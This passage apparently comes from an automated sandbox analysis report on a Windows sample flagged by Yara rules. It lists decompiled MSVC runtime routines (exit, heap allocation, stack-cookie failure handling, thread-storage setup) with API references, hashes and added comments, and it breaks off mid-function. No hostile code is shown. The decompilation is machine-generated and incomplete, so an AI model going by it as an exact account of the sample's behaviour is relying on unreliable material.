  • Part of subcall function 00A32C0D: GetModuleHandleW.KERNEL32(mscoree.dll,?,00A32C45,00000000,?,00A33432,000000FF,0000001E,00000001,00000000,00000000,?,00A3484E,00000000,00000001,00000000), ref: 00A32C17
  • Part of subcall function 00A32C0D: GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00A32C27
• ExitProcess.KERNEL32 ref: 00A32C49
Memory Dump Source
• Source File: 00000001.00000002.199966421.0000000000A31000.00000020.00020000.sdmp, Offset: 00A30000, based on PE: true
• Associated: 00000001.00000002.199961685.0000000000A30000.00000002.00020000.sdmp
• Associated: 00000001.00000002.199974203.0000000000A39000.00000002.00020000.sdmp
• Associated: 00000001.00000002.199979711.0000000000A3D000.00000004.00020000.sdmp
• Associated: 00000001.00000002.200014509.0000000000A3F000.00000002.00020000.sdmp
Similarity
• API ID: ExitProcess$AddressHandleModuleProc___crt
• String ID:
• API String ID: 2427264223-0
• Opcode ID: 08fd2e21e45ef6de31c63db3382eec9c3f82083c394db006f679721884149c31
• Instruction ID: be03d589867a3ca11d6f6c602fc507ebf2da42cf1e4f3c942c9f792585d44e84
• Opcode Fuzzy Hash: 08fd2e21e45ef6de31c63db3382eec9c3f82083c394db006f679721884149c31
• Instruction Fuzzy Hash: 00B09231000148BBCB052F52DE0AD8E7F2AEB813A0B108020F81809031DFB2ED92DEC0
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 86%
                                                                                                            			E00A365CB(signed int _a4, signed int _a8, long _a12) {
                                                                                                            				void* _t10;
                                                                                                            				long _t11;
                                                                                                            				long _t12;
                                                                                                            				signed int _t13;
                                                                                                            				signed int _t17;
                                                                                                            				long _t19;
                                                                                                            				long _t24;
                                                                                                            
                                                                                                            				_t17 = _a4;
                                                                                                            				if(_t17 == 0) {
                                                                                                            					L3:
                                                                                                            					_t24 = _t17 * _a8;
                                                                                                            					__eflags = _t24;
                                                                                                            					if(_t24 == 0) {
                                                                                                            						_t24 = _t24 + 1;
                                                                                                            						__eflags = _t24;
                                                                                                            					}
                                                                                                            					goto L5;
                                                                                                            					L6:
                                                                                                            					_t10 = RtlAllocateHeap( *0xa3e8c0, 8, _t24); // executed
                                                                                                            					__eflags = 0;
                                                                                                            					if(0 == 0) {
                                                                                                            						goto L7;
                                                                                                            					}
                                                                                                            					L14:
                                                                                                            					return _t10;
                                                                                                            					goto L15;
                                                                                                            					L7:
                                                                                                            					__eflags =  *0xa3e8c4;
                                                                                                            					if( *0xa3e8c4 == 0) {
                                                                                                            						_t19 = _a12;
                                                                                                            						__eflags = _t19;
                                                                                                            						if(_t19 != 0) {
                                                                                                            							 *_t19 = 0xc;
                                                                                                            						}
                                                                                                            					} else {
                                                                                                            						_t11 = E00A33D86(_t10, _t24);
                                                                                                            						__eflags = _t11;
                                                                                                            						if(_t11 != 0) {
                                                                                                            							L5:
                                                                                                            							_t10 = 0;
                                                                                                            							__eflags = _t24 - 0xffffffe0;
                                                                                                            							if(_t24 > 0xffffffe0) {
                                                                                                            								goto L7;
                                                                                                            							} else {
                                                                                                            								goto L6;
                                                                                                            							}
                                                                                                            						} else {
                                                                                                            							_t12 = _a12;
                                                                                                            							__eflags = _t12;
                                                                                                            							if(_t12 != 0) {
                                                                                                            								 *_t12 = 0xc;
                                                                                                            							}
                                                                                                            							_t10 = 0;
                                                                                                            						}
                                                                                                            					}
                                                                                                            					goto L14;
                                                                                                            				} else {
                                                                                                            					_t13 = 0xffffffe0;
                                                                                                            					_t27 = _t13 / _t17 - _a8;
                                                                                                            					if(_t13 / _t17 >= _a8) {
                                                                                                            						goto L3;
                                                                                                            					} else {
                                                                                                            						 *((intOrPtr*)(E00A34264(_t27))) = 0xc;
                                                                                                            						return 0;
                                                                                                            					}
                                                                                                            				}
                                                                                                            				L15:
                                                                                                            			}

                                                                                                            			Disassembly listing for this function (addresses 0x00a365d0 to 0x00a3664c): only the address column survived extraction; the instruction text is not recoverable here.

                                                                                                            APIs
                                                                                                            • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00A34898,00000000,?,00000000,00000000,00000000,?,00A33F10,00000001,00000214), ref: 00A3660E
                                                                                                              • Part of subcall function 00A34264: __getptd_noexit.LIBCMT ref: 00A34264
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.199966421.0000000000A31000.00000020.00020000.sdmp, Offset: 00A30000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.199961685.0000000000A30000.00000002.00020000.sdmp
                                                                                                            • Associated: 00000001.00000002.199974203.0000000000A39000.00000002.00020000.sdmp
                                                                                                            • Associated: 00000001.00000002.199979711.0000000000A3D000.00000004.00020000.sdmp
                                                                                                            • Associated: 00000001.00000002.200014509.0000000000A3F000.00000002.00020000.sdmp
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: AllocateHeap__getptd_noexit
                                                                                                            • String ID:
                                                                                                            • API String ID: 328603210-0
                                                                                                            • Opcode ID: 418da5adc2131fb527aa776fa09e5ac2822440f41a90ec37be13e6b90e9f723f
                                                                                                            • Instruction ID: 4836b79293768bfab188c873b7f56a48d949084ca3e14dfdb6cbd4ed3410093b
                                                                                                            • Opcode Fuzzy Hash: 418da5adc2131fb527aa776fa09e5ac2822440f41a90ec37be13e6b90e9f723f
                                                                                                            • Instruction Fuzzy Hash: D501D431201215FBEB29DF65DC16B673394AB817A0F00C63AF816CB1E4D7B0DC01C650
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 25%
                                                                                                            			E00A32E90(intOrPtr _a4) {
                                                                                                            				void* __ebp;
                                                                                                            				void* _t2;
                                                                                                            				void* _t3;
                                                                                                            				void* _t4;
                                                                                                            				void* _t5;
                                                                                                            				void* _t8;
                                                                                                            
                                                                                                            				_push(0);
                                                                                                            				_push(0);
                                                                                                            				_push(_a4);
                                                                                                            				_t2 = E00A32D50(_t3, _t4, _t5, _t8); // executed; E00A32D50 is _doexit, reached here as _doexit(_a4, 0, 0), i.e. the CRT exit() path (atexit handlers run, then the process ends)
                                                                                                            				return _t2;
                                                                                                            			}

                                                                                                            			Disassembly listing for this function (addresses 0x00a32e95 to 0x00a32ea5): only the address column survived extraction; the instruction text is not recoverable here.

                                                                                                            APIs
                                                                                                            • _doexit.LIBCMT ref: 00A32E9C
                                                                                                              • Part of subcall function 00A32D50: __lock.LIBCMT ref: 00A32D5E
                                                                                                              • Part of subcall function 00A32D50: DecodePointer.KERNEL32(00A3B5D8,00000020,00A32EB7,00000000,00000001,00000000,?,00A32EF7,000000FF,?,00A33919,00000011,00000000,?,00A33E7B,0000000D), ref: 00A32D9A
                                                                                                              • Part of subcall function 00A32D50: DecodePointer.KERNEL32(?,00A32EF7,000000FF,?,00A33919,00000011,00000000,?,00A33E7B,0000000D), ref: 00A32DAB
                                                                                                              • Part of subcall function 00A32D50: DecodePointer.KERNEL32(-00000004,?,00A32EF7,000000FF,?,00A33919,00000011,00000000,?,00A33E7B,0000000D), ref: 00A32DD1
                                                                                                              • Part of subcall function 00A32D50: DecodePointer.KERNEL32(?,00A32EF7,000000FF,?,00A33919,00000011,00000000,?,00A33E7B,0000000D), ref: 00A32DE4
                                                                                                              • Part of subcall function 00A32D50: DecodePointer.KERNEL32(?,00A32EF7,000000FF,?,00A33919,00000011,00000000,?,00A33E7B,0000000D), ref: 00A32DEE
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.199966421.0000000000A31000.00000020.00020000.sdmp, Offset: 00A30000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.199961685.0000000000A30000.00000002.00020000.sdmp
                                                                                                            • Associated: 00000001.00000002.199974203.0000000000A39000.00000002.00020000.sdmp
                                                                                                            • Associated: 00000001.00000002.199979711.0000000000A3D000.00000004.00020000.sdmp
                                                                                                            • Associated: 00000001.00000002.200014509.0000000000A3F000.00000002.00020000.sdmp
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: DecodePointer$__lock_doexit
                                                                                                            • String ID:
                                                                                                            • API String ID: 3343572566-0
                                                                                                            • Opcode ID: b7f9ddcf0c01e83a82a0f1c6c29853ea6c7db7599a0eb0d3eddd439c3244ce42
                                                                                                            • Instruction ID: 91a8af19b96850bcefb9d18c0690b258ddad6f0c70d3639b7fbd0fbb61643ae6
                                                                                                            • Opcode Fuzzy Hash: b7f9ddcf0c01e83a82a0f1c6c29853ea6c7db7599a0eb0d3eddd439c3244ce42
                                                                                                            • Instruction Fuzzy Hash: DDB0923258020833DA212542BC03F063A0987C0BA4E250020BA0C191A2AAA2A9628189
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            • RtlEncodePointer.NTDLL(00000000,00A36286,00A3E188,00000314,00000000,?,?,?,?,?,00A34792,00A3E188,Microsoft Visual C++ Runtime Library,00012010), ref: 00A33DB0
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.199966421.0000000000A31000.00000020.00020000.sdmp, Offset: 00A30000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.199961685.0000000000A30000.00000002.00020000.sdmp
                                                                                                            • Associated: 00000001.00000002.199974203.0000000000A39000.00000002.00020000.sdmp
                                                                                                            • Associated: 00000001.00000002.199979711.0000000000A3D000.00000004.00020000.sdmp
                                                                                                            • Associated: 00000001.00000002.200014509.0000000000A3F000.00000002.00020000.sdmp
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: EncodePointer
                                                                                                            • String ID:
                                                                                                            • API String ID: 2118026453-0
                                                                                                            • Opcode ID: d5a51aade878ea0ae380219384c34cf3cfa090dc49b212c4d3542ebf7c0ad3c2
                                                                                                            • Instruction ID: 6ef8e26dfb9d7dbbd09656e88ac4e5f81dfd7ead2c372431571065e31aa8a4e2
                                                                                                            • Opcode Fuzzy Hash: d5a51aade878ea0ae380219384c34cf3cfa090dc49b212c4d3542ebf7c0ad3c2
                                                                                                            • Instruction Fuzzy Hash:
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Non-executed Functions

                                                                                                            C-Code - Quality: 85%
                                                                                                            			E00A32701(intOrPtr __eax, intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, char _a4) {
                                                                                                            				intOrPtr _v0;
                                                                                                            				void* _v804;
                                                                                                            				intOrPtr _v808;
                                                                                                            				intOrPtr _v812;
                                                                                                            				intOrPtr _t6;
                                                                                                            				intOrPtr _t11;
                                                                                                            				intOrPtr _t12;
                                                                                                            				intOrPtr _t13;
                                                                                                            				long _t17;
                                                                                                            				intOrPtr _t21;
                                                                                                            				intOrPtr _t22;
                                                                                                            				intOrPtr _t25;
                                                                                                            				intOrPtr _t26;
                                                                                                            				intOrPtr _t27;
                                                                                                            				intOrPtr* _t31;
                                                                                                            				void* _t34;
                                                                                                            
                                                                                                            				_t27 = __esi;
                                                                                                            				_t26 = __edi;
                                                                                                            				_t25 = __edx;
                                                                                                            				_t22 = __ecx;
                                                                                                            				_t21 = __ebx;
                                                                                                            				_t6 = __eax;
                                                                                                            				_t34 = _t22 -  *0xa3d07c; // 0xa189a5e1: the process-wide /GS cookie; the decompiler has merged __security_check_cookie (cmp ecx, __security_cookie) with the failure handler that follows it
                                                                                                            				if(_t34 == 0) {
                                                                                                            					asm("repe ret"); // cookie intact: plain return to the caller's epilogue
                                                                                                            				}
                                                                                                            				// cookie mismatch: everything below matches the MSVC CRT __report_gsfailure pattern. The register and segment values are copied into a static CONTEXT at 0xa3ddxx so the crash record describes the faulting frame.
                                                                                                            				 *0xa3ddd8 = _t6;
                                                                                                            				 *0xa3ddd4 = _t22;
                                                                                                            				 *0xa3ddd0 = _t25;
                                                                                                            				 *0xa3ddcc = _t21;
                                                                                                            				 *0xa3ddc8 = _t27;
                                                                                                            				 *0xa3ddc4 = _t26;
                                                                                                            				 *0xa3ddf0 = ss;
                                                                                                            				 *0xa3dde4 = cs;
                                                                                                            				 *0xa3ddc0 = ds;
                                                                                                            				 *0xa3ddbc = es;
                                                                                                            				 *0xa3ddb8 = fs;
                                                                                                            				 *0xa3ddb4 = gs;
                                                                                                            				asm("pushfd");
                                                                                                            				_pop( *0xa3dde8);
                                                                                                            				 *0xa3dddc =  *_t31;
                                                                                                            				 *0xa3dde0 = _v0;
                                                                                                            				 *0xa3ddec =  &_a4;
                                                                                                            				 *0xa3dd28 = 0x10001; // ContextFlags = CONTEXT_CONTROL (CONTEXT_i386 | 0x1)
                                                                                                            				_t11 =  *0xa3dde0; // 0x0
                                                                                                            				 *0xa3dcdc = _t11;
                                                                                                            				 *0xa3dcd0 = 0xc0000409; // ExceptionCode = STATUS_STACK_BUFFER_OVERRUN
                                                                                                            				 *0xa3dcd4 = 1; // ExceptionFlags = EXCEPTION_NONCONTINUABLE: execution must not resume in the corrupted frame
                                                                                                            				_t12 =  *0xa3d07c; // 0xa189a5e1: __security_cookie, saved into the record for post-mortem triage
                                                                                                            				_v812 = _t12;
                                                                                                            				_t13 =  *0xa3d080; // 0x5e765a1e: __security_cookie_complement (bitwise NOT of the cookie), saved alongside it
                                                                                                            				_v808 = _t13;
                                                                                                            				 *0xa3dd20 = IsDebuggerPresent(); // remembered so the second debugger hook below only fires when no debugger was already attached
                                                                                                            				_push(1);
                                                                                                            				E00A3520E(_t14); // _crt_debugger_hook(_CRT_DEBUGGER_GSFAILURE): a no-op breakpoint site a debugger can trap on
                                                                                                            				SetUnhandledExceptionFilter(0); // remove any filter the program (or an injected module) installed, so the fault cannot be swallowed
                                                                                                            				_t17 = UnhandledExceptionFilter(0xa3922c); // hand the STATUS_STACK_BUFFER_OVERRUN record to the default filter (attached debugger / WER)
                                                                                                            				if( *0xa3dd20 == 0) {
                                                                                                            					_push(1);
                                                                                                            					E00A3520E(_t17);
                                                                                                            				}
                                                                                                            				return TerminateProcess(GetCurrentProcess(), 0xc0000409); // the frame is untrusted, so no unwinding: the process is killed with exit code 0xC0000409
                                                                                                            			}

                                                                                                            			Disassembly listing for this function (addresses 0x00a32701 to 0x00a3335f): only the address column survived extraction; the instruction text is not recoverable here.
                                                                                                            0x00a33364
                                                                                                            0x00a33366
                                                                                                            0x00a3336e
                                                                                                            0x00a33379
                                                                                                            0x00a33386
                                                                                                            0x00a33388
                                                                                                            0x00a3338a
                                                                                                            0x00a3338f
                                                                                                            0x00a333a3

                                                                                                            APIs
                                                                                                            • IsDebuggerPresent.KERNEL32 ref: 00A33359
                                                                                                            • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00A3336E
                                                                                                            • UnhandledExceptionFilter.KERNEL32(00A3922C), ref: 00A33379
                                                                                                            • GetCurrentProcess.KERNEL32(C0000409), ref: 00A33395
                                                                                                            • TerminateProcess.KERNEL32(00000000), ref: 00A3339C
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.199966421.0000000000A31000.00000020.00020000.sdmp, Offset: 00A30000, based on PE: true
                                                                                                             • Associated: 00000001.00000002.199961685.0000000000A30000.00000002.00020000.sdmp
                                                                                                             • Associated: 00000001.00000002.199974203.0000000000A39000.00000002.00020000.sdmp
                                                                                                             • Associated: 00000001.00000002.199979711.0000000000A3D000.00000004.00020000.sdmp
                                                                                                             • Associated: 00000001.00000002.200014509.0000000000A3F000.00000002.00020000.sdmp
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                                            • String ID:
                                                                                                            • API String ID: 2579439406-0
                                                                                                            • Opcode ID: 21a0f396c1928f7740c8950c90544f383a83b610f2474532d0ec3d0bb1f38cef
                                                                                                            • Instruction ID: a286bc1c8da6f82438b4c8a929b09aa1e077d767a939a1260463cc233e4cbeaf
                                                                                                            • Opcode Fuzzy Hash: 21a0f396c1928f7740c8950c90544f383a83b610f2474532d0ec3d0bb1f38cef
                                                                                                            • Instruction Fuzzy Hash: 6B21B8B4806304DFDB44DFE9FD48A957BB8FB48388F00502AF90987260E7B09992CF15
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 100%
                                                                                                             			E00A34991() {
                                                                                                             				/* CRT start-up helper: registers E00A3494F as the process-wide
                                                                                                             				   unhandled-exception filter and returns 0. This is the shape of the
                                                                                                             				   MSVC CRT's __CxxSetUnhandledExceptionFilter(), which installs
                                                                                                             				   __CxxUnhandledExceptionFilter; runtime initialisation, not
                                                                                                             				   sample-specific logic. */
                                                                                                             				SetUnhandledExceptionFilter(E00A3494F);
                                                                                                             				return 0;
                                                                                                             			}




                                                                                                            APIs
                                                                                                            • SetUnhandledExceptionFilter.KERNEL32(Function_0000494F), ref: 00A34996
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.199966421.0000000000A31000.00000020.00020000.sdmp, Offset: 00A30000, based on PE: true
                                                                                                             • Associated: 00000001.00000002.199961685.0000000000A30000.00000002.00020000.sdmp
                                                                                                             • Associated: 00000001.00000002.199974203.0000000000A39000.00000002.00020000.sdmp
                                                                                                             • Associated: 00000001.00000002.199979711.0000000000A3D000.00000004.00020000.sdmp
                                                                                                             • Associated: 00000001.00000002.200014509.0000000000A3F000.00000002.00020000.sdmp
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: ExceptionFilterUnhandled
                                                                                                            • String ID:
                                                                                                            • API String ID: 3192549508-0
                                                                                                            • Opcode ID: 49314069b211a58095dd99997b616dbf20929525b59f28683fa17e74a68cfdea
                                                                                                            • Instruction ID: fe58ac8cc7061b7873373b380bc3c1d00e20bcf123352fa180ab6a567e5278d7
                                                                                                            • Opcode Fuzzy Hash: 49314069b211a58095dd99997b616dbf20929525b59f28683fa17e74a68cfdea
                                                                                                            • Instruction Fuzzy Hash: 2B9002B025114156468497B49C4B6572594AA4D622B4118607415C5158DB9050459551
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 62%
                                                                                                             			E00A340A7(void* __ebx) {
                                                                                                             				/* Shape of the MSVC CRT's _mtinit(): per-thread data set-up run from the
                                                                                                             				   CRT start-up path, not sample-specific logic. It resolves the
                                                                                                             				   fiber-local-storage API (FlsAlloc/FlsGetValue/FlsSetValue/FlsFree)
                                                                                                             				   from kernel32, falls back to the Tls* equivalents where Fls* is
                                                                                                             				   absent, stores the resolved pointers encoded, then allocates and
                                                                                                             				   registers the calling thread's per-thread data block. */
                                                                                                             				void* __edi;
                                                                                                             				void* __esi;
                                                                                                             				_Unknown_base(*)()* _t7;
                                                                                                             				long _t10;
                                                                                                             				void* _t11;
                                                                                                             				int _t12;
                                                                                                             				void* _t14;
                                                                                                             				void* _t15;
                                                                                                             				void* _t16;
                                                                                                             				void* _t18;
                                                                                                             				intOrPtr _t21;
                                                                                                             				long _t26;
                                                                                                             				void* _t30;
                                                                                                             				struct HINSTANCE__* _t35;
                                                                                                             				intOrPtr* _t36;
                                                                                                             				void* _t39;
                                                                                                             				intOrPtr* _t41;
                                                                                                             				void* _t42;
                                                                                                             
                                                                                                             				_t30 = __ebx;
                                                                                                             				_t35 = GetModuleHandleW(L"KERNEL32.DLL");	/* always loaded; no LoadLibrary needed */
                                                                                                             				if(_t35 != 0) {
                                                                                                             					/* 0xa3e178..0xa3e184: pointer slots for FlsAlloc, FlsGetValue, FlsSetValue
                                                                                                             					   and FlsFree; any of them is NULL on a system without the Fls* API. */
                                                                                                             					 *0xa3e178 = GetProcAddress(_t35, "FlsAlloc");
                                                                                                             					 *0xa3e17c = GetProcAddress(_t35, "FlsGetValue");
                                                                                                             					 *0xa3e180 = GetProcAddress(_t35, "FlsSetValue");
                                                                                                             					_t7 = GetProcAddress(_t35, "FlsFree");
                                                                                                             					__eflags =  *0xa3e178;
                                                                                                             					_t39 = TlsSetValue;
                                                                                                             					 *0xa3e184 = _t7;
                                                                                                             					if( *0xa3e178 == 0) {
                                                                                                             						L6:
                                                                                                             						/* Fallback to the TLS API; E00A33DB7 wraps TlsAlloc so the slot keeps
                                                                                                             						   FlsAlloc's (callback) calling shape. */
                                                                                                             						 *0xa3e17c = TlsGetValue;
                                                                                                             						 *0xa3e178 = E00A33DB7;
                                                                                                             						 *0xa3e180 = _t39;
                                                                                                             						 *0xa3e184 = TlsFree;
                                                                                                             					} else {
                                                                                                             						__eflags =  *0xa3e17c;
                                                                                                             						if( *0xa3e17c == 0) {
                                                                                                             							goto L6;
                                                                                                             						} else {
                                                                                                             							__eflags =  *0xa3e180;
                                                                                                             							if( *0xa3e180 == 0) {
                                                                                                             								goto L6;
                                                                                                             							} else {
                                                                                                             								__eflags = _t7;
                                                                                                             								if(_t7 == 0) {
                                                                                                             									goto L6;
                                                                                                             								}
                                                                                                             							}
                                                                                                             						}
                                                                                                             					}
                                                                                                             					_t10 = TlsAlloc();	/* CRT __tlsindex */
                                                                                                             					 *0xa3d1b4 = _t10;
                                                                                                             					__eflags = _t10 - 0xffffffff;
                                                                                                             					if(_t10 == 0xffffffff) {	/* TLS_OUT_OF_INDEXES */
                                                                                                             						L15:
                                                                                                             						_t11 = 0;	/* failure: return 0 */
                                                                                                             						__eflags = 0;
                                                                                                             					} else {
                                                                                                             						_t12 = TlsSetValue(_t10,  *0xa3e17c);	/* seed the slot with the FlsGetValue pointer */
                                                                                                             						__eflags = _t12;
                                                                                                             						if(_t12 == 0) {
                                                                                                             							goto L15;
                                                                                                             						} else {
                                                                                                             							E00A32C62();	/* initialises the CRT's other encoded function pointers */
                                                                                                             							_t41 = __imp__EncodePointer;
                                                                                                             							/* Store the four Fls* pointers encoded: a memory-corruption write cannot
                                                                                                             							   redirect them without the per-process EncodePointer secret. They are
                                                                                                             							   passed through DecodePointer before use below. */
                                                                                                             							_t14 =  *_t41( *0xa3e178);
                                                                                                             							 *0xa3e178 = _t14;
                                                                                                             							_t15 =  *_t41( *0xa3e17c);
                                                                                                             							 *0xa3e17c = _t15;
                                                                                                             							_t16 =  *_t41( *0xa3e180);
                                                                                                             							 *0xa3e180 = _t16;
                                                                                                             							 *0xa3e184 =  *_t41( *0xa3e184);
                                                                                                             							_t18 = E00A33778();	/* CRT lock-table initialisation (_mtinitlocks shape) */
                                                                                                             							__eflags = _t18;
                                                                                                             							if(_t18 == 0) {
                                                                                                             								L14:
                                                                                                             								E00A33DF4();	/* tear down on failure (_mtterm shape) */
                                                                                                             								goto L15;
                                                                                                             							} else {
                                                                                                             								_t36 = __imp__DecodePointer;
                                                                                                             								/* DecodePointer(FlsAlloc)(E00A33F78): allocate the CRT's FLS index, with
                                                                                                             								   E00A33F78 as the per-thread free callback; 0xa3d1b0 keeps the index. */
                                                                                                             								_t21 =  *((intOrPtr*)( *_t36()))( *0xa3e178, E00A33F78);
                                                                                                             								 *0xa3d1b0 = _t21;
                                                                                                             								__eflags = _t21 - 0xffffffff;
                                                                                                             								if(_t21 == 0xffffffff) {	/* FLS_OUT_OF_INDEXES */
                                                                                                             									goto L14;
                                                                                                             								} else {
                                                                                                             									_t42 = E00A34882(1, 0x214);	/* CRT calloc of the 0x214-byte per-thread data block */
                                                                                                             									__eflags = _t42;
                                                                                                             									if(_t42 == 0) {
                                                                                                             										goto L14;
                                                                                                             									} else {
                                                                                                             										/* DecodePointer(FlsSetValue)(index, block): bind the block to this thread */
                                                                                                             										__eflags =  *((intOrPtr*)( *_t36()))( *0xa3e180,  *0xa3d1b0, _t42);
                                                                                                             										if(__eflags == 0) {
                                                                                                             											goto L14;
                                                                                                             										} else {
                                                                                                             											_push(0);
                                                                                                             											_push(_t42);
                                                                                                             											E00A33E31(_t30, _t36, _t42, __eflags);	/* default-initialise the block (_initptd shape) */
                                                                                                             											_t26 = GetCurrentThreadId();
                                                                                                             											 *(_t42 + 4) =  *(_t42 + 4) | 0xffffffff;	/* block+4: thread handle = (uintptr_t)-1 */
                                                                                                             											 *_t42 = _t26;	/* block+0: thread id */
                                                                                                             											_t11 = 1;	/* success */
                                                                                                             										}
                                                                                                             									}
                                                                                                             								}
                                                                                                             							}
                                                                                                             						}
                                                                                                             					}
                                                                                                             					return _t11;
                                                                                                             				} else {
                                                                                                             					E00A33DF4();	/* no kernel32 handle: tear down and fail */
                                                                                                             					return 0;
                                                                                                             				}
                                                                                                             			}
                                                                                                            0x00a341cf
                                                                                                            0x00a341d2
                                                                                                            0x00000000
                                                                                                            0x00a341d4
                                                                                                            0x00a341e0
                                                                                                            0x00a341e4
                                                                                                            0x00a341e6
                                                                                                            0x00000000
                                                                                                            0x00a341e8
                                                                                                            0x00a341f9
                                                                                                            0x00a341fb
                                                                                                            0x00000000
                                                                                                            0x00a341fd
                                                                                                            0x00a341fd
                                                                                                            0x00a341ff
                                                                                                            0x00a34200
                                                                                                            0x00a34207
                                                                                                            0x00a3420d
                                                                                                            0x00a34211
                                                                                                            0x00a34215
                                                                                                            0x00a34215
                                                                                                            0x00a341fb
                                                                                                            0x00a341e6
                                                                                                            0x00a341d2
                                                                                                            0x00a341b3
                                                                                                            0x00a34167
                                                                                                            0x00a34221
                                                                                                            0x00a340bb
                                                                                                            0x00a340bb
                                                                                                            0x00a340c3
                                                                                                            0x00a340c3

                                                                                                            APIs
                                                                                                            • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,00A33165), ref: 00A340AF
                                                                                                            • __mtterm.LIBCMT ref: 00A340BB
                                                                                                              • Part of subcall function 00A33DF4: DecodePointer.KERNEL32(00000005,00A3421D,?,00A33165), ref: 00A33E05
                                                                                                              • Part of subcall function 00A33DF4: TlsFree.KERNEL32(00000019,00A3421D,?,00A33165), ref: 00A33E1F
                                                                                                            • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00A340D1
                                                                                                            • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00A340DE
                                                                                                            • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00A340EB
                                                                                                            • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00A340F8
                                                                                                            • TlsAlloc.KERNEL32(?,00A33165), ref: 00A34148
                                                                                                            • TlsSetValue.KERNEL32(00000000,?,00A33165), ref: 00A34163
                                                                                                            • __init_pointers.LIBCMT ref: 00A3416D
                                                                                                            • EncodePointer.KERNEL32(?,00A33165), ref: 00A3417E
                                                                                                            • EncodePointer.KERNEL32(?,00A33165), ref: 00A3418B
                                                                                                            • EncodePointer.KERNEL32(?,00A33165), ref: 00A34198
                                                                                                            • EncodePointer.KERNEL32(?,00A33165), ref: 00A341A5
                                                                                                            • DecodePointer.KERNEL32(00A33F78,?,00A33165), ref: 00A341C6
                                                                                                            • __calloc_crt.LIBCMT ref: 00A341DB
                                                                                                            • DecodePointer.KERNEL32(00000000,?,00A33165), ref: 00A341F5
                                                                                                            • __initptd.LIBCMT ref: 00A34200
                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 00A34207
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.199966421.0000000000A31000.00000020.00020000.sdmp, Offset: 00A30000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.199961685.0000000000A30000.00000002.00020000.sdmp
                                                                                                            • Associated: 00000001.00000002.199974203.0000000000A39000.00000002.00020000.sdmp
                                                                                                            • Associated: 00000001.00000002.199979711.0000000000A3D000.00000004.00020000.sdmp
                                                                                                            • Associated: 00000001.00000002.200014509.0000000000A3F000.00000002.00020000.sdmp
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Pointer$AddressEncodeProc$Decode$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__initptd__mtterm
                                                                                                            • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
                                                                                                            • API String ID: 3732613303-3819984048
                                                                                                            • Opcode ID: 067f278c6ea6613a378af4e414612811136941b191809c819be8e9e898957390
                                                                                                            • Instruction ID: 3dcfba39df8ae71afd75d539080dcfd1209ec653bcaac0c4dc88c88be8a47018
                                                                                                            • Opcode Fuzzy Hash: 067f278c6ea6613a378af4e414612811136941b191809c819be8e9e898957390
                                                                                                            • Instruction Fuzzy Hash: 09314D31A44750ABEB11EBF4AC4969B7EA4AB6A760F100B26F814D32F0DBB49443DF50
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 66%
                                                                                                            			E00A3784D(void* __ecx, void* __edx, void* __esi, intOrPtr* _a4) {
                                                                                                            				signed int _v8;
                                                                                                            				void* __ebp;
                                                                                                            				void* _t16;
                                                                                                            				intOrPtr* _t19;
                                                                                                            				void* _t23;
                                                                                                            				void* _t26;
                                                                                                            
                                                                                                            				_t27 = __esi;
                                                                                                            				_t25 = __edx;
                                                                                                            				_t32 =  *((intOrPtr*)( *_a4)) - 0xe0434352;
                                                                                                            				if( *((intOrPtr*)( *_a4)) == 0xe0434352) {
                                                                                                            					L8:
                                                                                                            					__eflags =  *((intOrPtr*)(E00A33F5E(_t23, _t25, _t26, __eflags) + 0x90));
                                                                                                            					if(__eflags > 0) {
                                                                                                            						_t16 = E00A33F5E(_t23, _t25, _t26, __eflags);
                                                                                                            						_t9 = _t16 + 0x90;
                                                                                                            						 *_t9 =  *((intOrPtr*)(_t16 + 0x90)) - 1;
                                                                                                            						__eflags =  *_t9;
                                                                                                            					}
                                                                                                            					goto L10;
                                                                                                            				} else {
                                                                                                            					__eflags = __eax - 0xe0434f4d;
                                                                                                            					if(__eflags == 0) {
                                                                                                            						goto L8;
                                                                                                            					} else {
                                                                                                            						__eflags = __eax - 0xe06d7363;
                                                                                                            						if(__eflags != 0) {
                                                                                                            							L10:
                                                                                                            							__eflags = 0;
                                                                                                            							return 0;
                                                                                                            						} else {
